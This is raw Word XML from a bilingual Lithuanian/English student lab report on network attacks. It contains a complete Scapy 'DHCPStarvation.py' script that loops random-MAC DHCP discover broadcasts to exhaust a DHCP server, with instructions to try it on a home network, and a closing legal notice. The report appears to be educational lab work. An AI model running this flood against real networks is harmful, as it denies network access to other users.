      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dhcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> = DHCP(options=[('message-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>type','discover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'),('end')])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B66E1AC" w14:textId="77777777" w:rsidR="003770C1" w:rsidRPr="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64EC6544" w14:textId="77777777" w:rsidR="003770C1" w:rsidRPr="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dhcp_discover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ETHER/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>bootp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dhcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BF5BD30" w14:textId="77777777" w:rsidR="003770C1" w:rsidRPr="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D67D252" w14:textId="77777777" w:rsidR="003770C1" w:rsidRPr="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12FC859C" w14:textId="77777777" w:rsidR="003770C1" w:rsidRPr="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sendp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dhcp_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>discover,iface</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>='eth0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>',loop</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>1,verbose</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE156DD" w14:textId="393928AB" w:rsidR="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:ind w:left="2592"/>
      </w:pPr>
      <w:r>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE80F06" w14:textId="71493D88" w:rsidR="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Kadangi neturiu prieigos dabar atlikti tai praktiškai, tai pavaizdavau per Wireshark programą. Tačiau jei jūs bandote tai atlikti ant savo namų interneto, paleidę skriptą su „python DHCPStarvation.py“ bandykite prisijungti prie namų tinklo telefonu. Jeigu jums nepavyko prisijungti, arba prisijungėte labai sunkiai, reiškias jūsų ataka sėkmingai pavyko.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CA38E2" w14:textId="77777777" w:rsidR="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1"/>
    <w:p w14:paraId="4A024C53" w14:textId="266E3B05" w:rsidR="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:r>
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604F166D" w14:textId="77339E76" w:rsidR="003770C1" w:rsidRPr="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:r w:rsidRPr="003770C1">
        <w:t xml:space="preserve">Create the file with </w:t>
      </w:r>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>touch DHCPStarvation.py</w:t>
      </w:r>
      <w:r w:rsidRPr="003770C1">
        <w:t xml:space="preserve"> and edit it with </w:t>
      </w:r>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nano</w:t>
      </w:r>
      <w:r w:rsidRPr="003770C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DHCPStarvation.py</w:t>
      </w:r>
      <w:r w:rsidRPr="003770C1">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CC2692" w14:textId="77777777" w:rsidR="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF09013" w14:textId="77777777" w:rsidR="003770C1" w:rsidRPr="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D3E4FF" w14:textId="77777777" w:rsidR="003770C1" w:rsidRPr="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>conf.checkIPaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1304D80A" w14:textId="77777777" w:rsidR="003770C1" w:rsidRPr="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ETHER = Ether(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ff:ff:ff:ff:ff:ff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>RandMAC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> = IP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">='0.0.0.0', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>='255.255.255.255')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> = UDP(sport=68, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>=67)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>bootp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> = BOOTP(op=1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>chaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>RandMAC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dhcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> = DHCP(options=[('message-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>type','discover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'),('end')])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE0C376" w14:textId="77777777" w:rsidR="003770C1" w:rsidRPr="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38B758D0" w14:textId="77777777" w:rsidR="003770C1" w:rsidRPr="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dhcp_discover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ETHER/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>bootp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dhcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6CD70052" w14:textId="77777777" w:rsidR="003770C1" w:rsidRPr="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F34450D" w14:textId="77777777" w:rsidR="003770C1" w:rsidRPr="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6349AF8E" w14:textId="77777777" w:rsidR="003770C1" w:rsidRPr="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sendp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dhcp_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>discover,iface</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>='eth0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>',loop</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>1,verbose</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE0BE65" w14:textId="77777777" w:rsidR="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:ind w:left="2592"/>
      </w:pPr>
      <w:r>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D2E355" w14:textId="7AB2A6F4" w:rsidR="000F65D6" w:rsidRPr="000F65D6" w:rsidRDefault="000F65D6" w:rsidP="000F65D6">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="000F65D6">
        <w:t xml:space="preserve">Since I don't have access to run it in practice right now, I demonstrated it using Wireshark. However, if you try this on your home network, run the script with </w:t>
      </w:r>
      <w:r w:rsidRPr="000F65D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>python DHCPStarvation.py</w:t>
      </w:r>
      <w:r w:rsidRPr="000F65D6">
        <w:t xml:space="preserve"> and then try to connect to the home network with your phone. If you cannot connect, or you can only connect with great difficulty, it means your attack was successful. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A15C20" w14:textId="4A812287" w:rsidR="008750A7" w:rsidRDefault="008750A7" w:rsidP="003770C1"/>
    <w:p w14:paraId="571684C3" w14:textId="77777777" w:rsidR="008750A7" w:rsidRDefault="008750A7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="546BE6C6" w14:textId="61F5391B" w:rsidR="000F65D6" w:rsidRDefault="008750A7" w:rsidP="008750A7">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Apibendrinimas</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>(Summary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D69B7FB" w14:textId="384C10F1" w:rsidR="008750A7" w:rsidRDefault="008750A7" w:rsidP="008750A7">
      <w:r>
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5387852D" w14:textId="634F89E3" w:rsidR="008750A7" w:rsidRPr="008750A7" w:rsidRDefault="008750A7" w:rsidP="008750A7">
      <w:r w:rsidRPr="008750A7">
        <w:t>Visi šiame darbe atlikti veiksmai — tinklo žvalgybos, ARP klastojimo, MITM, ICMP bei TCP/UDP apkrovos atakų testavimas, IDS/IPS sistemos Snort naudojimas — buvo vykdomi tik saugioje, izoliuotoje ir kontroliuojamoje VirtualBox virtualioje aplinkoje, skirtoje išimtinai mokymosi ir laboratoriniams tikslams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110CF242" w14:textId="77777777" w:rsidR="008750A7" w:rsidRPr="008750A7" w:rsidRDefault="008750A7" w:rsidP="008750A7">
      <w:r w:rsidRPr="008750A7">
        <w:t>Griežtai draudžiama bet kurią iš aprašytų technikų ar skriptų taikyti realiuose viešuose ar privačiuose tinkluose, kuriuose neturite aiškaus savininko leidimo. Tokie veiksmai būtų laikomi neteisėtais pagal LR įstatymus ir gali užtraukti baudžiamąją atsakomybę.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B67876" w14:textId="77777777" w:rsidR="008750A7" w:rsidRPr="008750A7" w:rsidRDefault="008750A7" w:rsidP="008750A7">
      <w:r w:rsidRPr="008750A7">
        <w:t>Ši dokumentacija yra skirta tik edukaciniams ir kibernetinio saugumo supratimą keliantiems tikslams, o visi bandymai buvo atlikti laboratorijoje, kurioje jokie realūs vartotojų duomenys ar infrastruktūra nebuvo paliesti ar trikdomi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F91507" w14:textId="77777777" w:rsidR="008750A7" w:rsidRDefault="008750A7" w:rsidP="008750A7"/>
    <w:p w14:paraId="2DE47896" w14:textId="33E308F1" w:rsidR="008750A7" w:rsidRDefault="008750A7" w:rsidP="008750A7">
      <w:r>
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746CCC1C" w14:textId="77777777" w:rsidR="008750A7" w:rsidRPr="008750A7" w:rsidRDefault="008750A7" w:rsidP="008750A7">
      <w:r w:rsidRPr="008750A7">
        <w:t>All actions and experiments described in this document — including network reconnaissance, ARP spoofing, Man-in-the-Middle (MITM) setups, ICMP/TCP/UDP flood tests, DHCP exhaustion, packet crafting with Scapy, and the deployment/testing of Snort IDS/IPS — were performed only within an isolated VirtualBox virtual environment created strictly for educational and laboratory purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDF3D98" w14:textId="77777777" w:rsidR="008750A7" w:rsidRPr="008750A7" w:rsidRDefault="008750A7" w:rsidP="008750A7">
      <w:r w:rsidRPr="008750A7">
        <w:t>Important legal &amp; safety notice (applies worldwide):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4AA797" w14:textId="77777777" w:rsidR="008750A7" w:rsidRPr="008750A7" w:rsidRDefault="008750A7" w:rsidP="008750A7">
      <w:r w:rsidRPr="008750A7">
        <w:t>These techniques and scripts must never be executed on public networks, third-party networks, or any production infrastructure unless you have explicit, documented permission from the network owner. Performing these actions outside a controlled lab environment can cause real damage, disrupt services, expose private data, and is likely illegal in many jurisdictions — potentially leading to criminal charges, civil liability, or disciplinary action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0C2E9D" w14:textId="77777777" w:rsidR="008750A7" w:rsidRPr="008750A7" w:rsidRDefault="008750A7" w:rsidP="008750A7">
      <w:r w:rsidRPr="008750A7">
        <w:t>Use this documentation only to learn defensive and research skills in a safe, ethical way:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30650019" w14:textId="77777777" w:rsidR="008750A7" w:rsidRPr="008750A7" w:rsidRDefault="008750A7" w:rsidP="008750A7">
      <w:r w:rsidRPr="008750A7">
        <w:t>Run code solely in isolated VMs or air-gapped labs you control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC1885D" w14:textId="77777777" w:rsidR="008750A7" w:rsidRPr="008750A7" w:rsidRDefault="008750A7" w:rsidP="008750A7">
      <w:r w:rsidRPr="008750A7">
        <w:t>Inform and obtain written consent from system/network owners before testing non-owned systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749923FC" w14:textId="77777777" w:rsidR="008750A7" w:rsidRPr="008750A7" w:rsidRDefault="008750A7" w:rsidP="008750A7">
      <w:r w:rsidRPr="008750A7">
        <w:t>Prefer non-disruptive, consented testing methodologies (e.g., defensive testing, simulations, red-team exercises under contract).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32067056" w14:textId="77777777" w:rsidR="008750A7" w:rsidRPr="008750A7" w:rsidRDefault="008750A7" w:rsidP="008750A7">
      <w:r w:rsidRPr="008750A7">
        <w:t>When in doubt, stop and seek authorization or consult an experienced instructor/mentor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C79DF" w14:textId="77777777" w:rsidR="008750A7" w:rsidRPr="008750A7" w:rsidRDefault="008750A7" w:rsidP="008750A7"/>
    <w:sectPr w:rsidR="008750A7" w:rsidRPr="008750A7" w:rsidSect="005E23AA">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720"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54BD6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10CCBA72"/>
    <w:lvl w:ilvl="0" w:tplc="954AB16C">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1BF1171"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="384AE4FA"/>
    <w:lvl w:ilvl="0" w:tplc="24540A0E">
      <w:numFmt w:val="bullet"/>
